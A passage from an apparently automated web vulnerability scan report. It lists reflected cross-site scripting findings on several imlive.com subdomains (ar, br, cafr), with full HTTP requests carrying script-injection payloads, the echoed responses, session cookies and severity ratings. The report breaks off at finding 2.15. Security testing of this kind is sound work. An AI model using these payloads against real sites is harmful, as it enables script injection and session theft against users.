Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:36 GMT
Connection: close
Content-Length: 23511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.5. http://ar.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:40 GMT
Connection: close
Content-Length: 23490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.6. http://ar.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:33 GMT
Connection: close
Content-Length: 23511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.7. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?34723"><a>3f71d325883=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: spvdr=vd=04dc6090-bd1f-4d6e-bf28-729633a25e9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:51 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:51 GMT
Connection: close
Content-Length: 18835
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;">
...[SNIP]...

2.8. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: spvdr=vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 19010
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.9. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:58 GMT
Connection: close
Content-Length: 21217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;">
...[SNIP]...

2.10. http://br.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:10 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.11. http://br.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:16 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.12. http://br.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:02 GMT
Connection: close
Content-Length: 8329
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=br.imlive.com&ul=/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://br.imlive.com:80/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.13. http://br.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:01 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.14. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
Set-Cookie: spvdr=vd=ed834416-472f-4af7-b757-36e07f79cd57&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 19533
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/?b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&iy=dallas&id=44&iu=1&vd=ed834416-472f-4af7-b757-36e07f79cd57';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.15. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

